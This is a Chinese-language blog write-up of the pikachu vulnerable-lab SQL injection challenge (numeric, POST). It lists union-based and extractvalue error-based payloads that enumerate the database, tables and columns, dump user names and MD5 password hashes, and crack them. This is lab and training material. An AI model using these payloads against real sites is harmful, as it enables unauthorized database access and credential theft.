pikachu靶场-SQLI-数字型注入(POST)

b1nz 发布于

pikachu靶场-SQLI-数字型注入(POST)

  1. 请求方式— POST
  2. 包裹方式— id=1
  3. 注入类型— 联合、报错、布尔盲注、延时

下面演示一下联合注入和报错注入by hand

联合注入

首先查列:

id=1 order by 1#&submit=%E6%9F%A5%E8%AF%A2

回显正常

id=1 order by 2#&submit=%E6%9F%A5%E8%AF%A2

回显正常

id=1 order by 3#&submit=%E6%9F%A5%E8%AF%A2

回显:

Unknown column '3' in 'order clause'

列数:2

查库:

id=-1 union select 1,database()#&submit=%E6%9F%A5%E8%AF%A2

回显:

hello,1
your email is: pikachu

库名为pikachu

查表:

id=-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='pikachu'#&submit=%E6%9F%A5%E8%AF%A2

回显:

hello,1
your email is: httpinfo,member,message,users,xssblind

表名为httpinfo,member,message,users,xssblind

查列:

id=-1 union select 1,group_concat(column_name) from information_schema.columns where table_schema='pikachu' and table_name='users' #&submit=%E6%9F%A5%E8%AF%A2

回显:

hello,1
your email is:id,username,password,level

列名为id,username,password,level

查字段:

id=-1 union select group_concat(username),group_concat(paswoord) from users#&submit=%E6%9F%A5%E8%AF%A2

id=-1 union select group_concat(username),group_concat(level) from users#&submit=%E6%9F%A5%E8%AF%A2

回显:

hello,admin,pikachu,test
your email is: e10adc3949ba59abbe56e057f20f883e,670b14728ad9902aecba32e22fa4f6bd,e99a18c428cb38d5f260853678922e03

hello,admin,pikachu,test
your email is: 1,2,3

对密码进行md5解密:

e10adc3949ba59abbe56e057f20f883e — 123456
670b14728ad9902aecba32e22fa4f6bd — 000000
e99a18c428cb38d5f260853678922e03 — abc123

用户名:

admin,pikachu,test

密码:

123456,000000,abc123

level:

1,2,3

报错注入

查库:

id=-1 and extractvalue(1,concat(0x7e,(select database())))#&submit=%E6%9F%A5%E8%AF%A2

回显:

XPATH syntax error: '~pikachu'

查表:

id=-1 and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='pikachu')))#&submit=%E6%9F%A5%E8%AF%A2

回显:

 XPATH syntax error: '~httpinfo,member,message,users,x'

报错信息有32字节的限制

如果显示里没有需要的表名,再用limit来查

查列:

id=-1 and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema='pikachu' and table_name='users')))#&submit=%E6%9F%A5%E8%AF%A2

回显:

XPATH syntax error: '~id,username,password,level'

查字段:

id=-1 and extractvalue(1,concat(0x7e,(select username from users limit 0,1)))#&submit=%E6%9F%A5%E8%AF%A2

回显:

XPATH syntax error: '~admin'

limit 1,1

回显:

XPATH syntax error: '~pikachu'

limit 2,1

回显:

XPATH syntax error: '~test'

limit 3,1

回显:

您输入的user id不存在

字段只有3个

接着查password:

id=-1 and extractvalue(1,concat(0x7e,(select password from users limit 0,1)))#&submit=%E6%9F%A5%E8%AF%A2

回显:

XPATH syntax error: '~e10adc3949ba59abbe56e057f20f883'

limit 1,1

回显:

XPATH syntax error: '~670b14728ad9902aecba32e22fa4f6b'

limit 2,1

回显:

XPATH syntax error: '~e99a18c428cb38d5f260853678922e0'

解码:

对密码进行md5解密:

e10adc3949ba59abbe56e057f20f883e — 123456
670b14728ad9902aecba32e22fa4f6bd — 000000
e99a18c428cb38d5f260853678922e03 — abc123

用户名:

admin,pikachu,test

密码:

123456,000000,abc123

如果对level字段有需求可以接着查,和查username和password字段的步骤一样^^

B1nz

B1nz

没头发掉了怎么办

9
5
7
NOTICE

今日掉发5根

CATEGORYS
TAGS
bugku ctfshow google dork http pikachu sqli-labs xss